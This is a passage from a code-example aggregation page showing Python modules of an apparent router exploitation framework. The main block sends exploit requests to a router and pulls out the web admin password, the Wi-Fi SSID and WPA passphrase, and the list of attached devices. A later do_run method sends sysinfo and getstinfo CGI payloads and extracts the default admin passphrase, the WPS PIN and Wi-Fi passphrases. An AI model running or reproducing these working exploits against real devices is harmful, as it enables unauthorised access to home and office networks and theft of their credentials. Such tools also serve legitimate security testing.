        # I don't feel like adding lxml into dependencies just for this module
        striptag = re.compile(r'<.*?>')
        try:
            print_warning("Sending exploit")

            # Request DeviceInfo
            response = requests.post(url, headers=headers, data=payload, timeout=60)
            if response.status_code != 200:
                raise requests.ConnectionError
            print_info("Writing response to DeviceInfo.xml")
            core.io.writetextfile(response.text, "DeviceInfo.xml")
            print_info("Parsing response")
            regex = re.search("<Description>(.*)", response.text)
            regex2 = re.search("<SerialNumber>(.*)", response.text)
            regex3 = re.search("<Firmwareversion>(.*)", response.text)
            try:
                description = striptag.sub('', regex.group(1))
                serial_number = striptag.sub('', regex2.group(1))
                firmware = striptag.sub('', regex3.group(1))
                print("Device: %s" % description)
                print("Serial number: %s" % serial_number)
                print("FW version: %s" % firmware)
            except IndexError:
                print_error("opps unable to locate this regular expression")

            # Request web UI password
            response = requests.post(url, headers=headers1, data=payload, timeout=60)
            if response.status_code != 200:
                raise requests.ConnectionError
            print_info("Writing response to LANConfigSecurity.xml")
            core.io.writetextfile(response.text, "LANConfigSecurity.xml")
            print_info("Parsing response")
            regex = re.search("<NewPassword>(.*)", response.text)
            try:
                password = striptag.sub('', regex.group(1))
                print("Password: %s" % password)
            except IndexError:
                print_error("opps unable to locate this regular expression")

            # Request WLAN info
            response = requests.post(url, headers=headers2, data=payload, timeout=60)
            if response.status_code != 200:
                raise requests.ConnectionError
            print_info("Writing response to WLANConfiguration.xml")
            core.io.writetextfile(response.text, "WLANConfiguration.xml")
            print_info("Parsing response")
            regex = re.search("<NewSSID>(.*)", response.text)
            regex2 = re.search("<NewBasicEncryptionModes>(.*)", response.text)
            try:
                ssid = regex.group(1)
                ssid = striptag.sub('', ssid)
                wlan_encryption = striptag.sub('', regex2.group(1))
                print("SSID: " + ssid)
                print("Encryption: %s" % wlan_encryption)
            except IndexError:
                print_error("opps unable to locate this regular expression")

            # Wlan password
            response = requests.post(url, headers=headers3, data=payload, timeout=60)
            if response.status_code != 200:
                raise requests.ConnectionError
            print_info("Writing response to WLANConfigurationGetWPASecurityKeys.xml")
            core.io.writetextfile(response.text, "WLANConfigurationGetWPASecurityKeys.xml")
            print_info("Parsing response")
            regex = re.search("<NewWPAPassphrase>(.*)", response.text)
            try:
                wlan_password = striptag.sub('', regex.group(1))
                print("Passphrase: %s" % wlan_password)
            except IndexError:
                print_error("opps unable to locate this regular expression")

            # Attached devices
            response = requests.post(url, headers=headers4, data=payload, timeout=60)
            if response.status_code != 200:
                raise requests.ConnectionError
            print_info("Writing response to DeviceInfoGetAttachDevice.xml")
            core.io.writetextfile(response.text, "DeviceInfoGetAttachDevice.xml")
            print_info("Parsing response")
            regex = re.search("<NewAttachDevice>(.*)", response.text)
            try:
                devices = striptag.sub('', regex.group(1))
                devices = devices.split('@')[1:]  # First element is number of records
                for device in devices:
                    device = device.split(";")
                    print("ID: %s" % device[0])
                    print("IP: %s" % device[1])
                    print("Name: %s" % device[2])
                    print("MAC: %s" % interface.utils.lookup_mac(device[3]))
                    print("Connection type: %s" % device[4])
            except IndexError:
                print_error("opps unable to locate this regular expression")

        except requests.ConnectionError as e:
            print_error("lost connection ")
            traceback.print_tb(e)
        except requests.Timeout:
            print_error("timeout")
Beispiel #44
0
 def do_host(self, e):
     print_info(self.host)
Beispiel #45
0
 def do_body(self, e):
     if self.body is True:
         print_info("yes")
     else:
         print_info("no")
Beispiel #46
0
 def do_ssl(self, e):
     if self.ssl is True:
         print_info("yes")
     else:
         print_info("no")
Beispiel #47
0
 def do_command(self, e):
     print_info(self.command)
Beispiel #48
0
 def do_command(self, e):
     print_info(self.command)
Beispiel #49
0
    def do_run(self, e):
        print_warning("Sending payload sysinfo")
        result = self.send_payload("sysinfo.cgi")
        if result:
            print_success("Got system information, writing to file")
            core.io.writetextfile(result, "sysinfo")
            print_info("Analyzing sysinfo...")
            regex = re.search("device::default_passphrase=(.*)", result)
            if regex:
                try:
                    print_green("Default admin passphrasse: " + regex.group(1))
                except IndexError:
                    print_error("Unable to locate passphrasse")

            regex = re.search("device::mac_addr=(.*)", result)
            if regex:
                try:
                    print_green("MAC: " + regex.group(1) +
                                lookup_mac(regex.group(1)))
                except IndexError:
                    print_error("Unable to locate MAC")
            regex = re.search("device::default_ssid=(.*)", result)
            if regex:
                try:
                    print_green("Default SSID:: " + regex.group(1))
                except IndexError:
                    print_error("Unable to locate default SSID")
            regex = re.search("device::wps_pin=(.*)", result)
            if regex:
                try:
                    print_green("WPS Pin: " + regex.group(1))
                except IndexError:
                    print_error("Unable to locate WPS pin")
            regex = re.search("wl0_ssid=(.*)", result)
            if regex:
                try:
                    print_green("SSID: " + regex.group(1))
                except IndexError:
                    print_error("Unable to locate SSID")
            regex = re.search("wl0_passphrase=(.*)", result)
            if regex:
                try:
                    print_green("Passphrase: " + regex.group(1))
                except IndexError:
                    print_error("Unable to locate passphrase")
            regex = re.search("wl1_ssid=(.*)", result)
            if regex:
                try:
                    print_green("SSID: " + regex.group(1))
                except IndexError:
                    print_error("Unable to locate SSID")
            regex = re.search("wl1_passphrase=(.*)", result)
            if regex:
                try:
                    print_green("Passphrase: " + regex.group(1))
                except IndexError:
                    print_error("Unable to locate passphrase")
        print_yellow("Sending payload getstinfo")
        result = self.send_payload("getstinfo.cgi")
        if result:
            print_success("Got SSID hash and passphrase hash, writing to file")
            core.io.writetextfile(result, "getstinfo")
            print_success(result)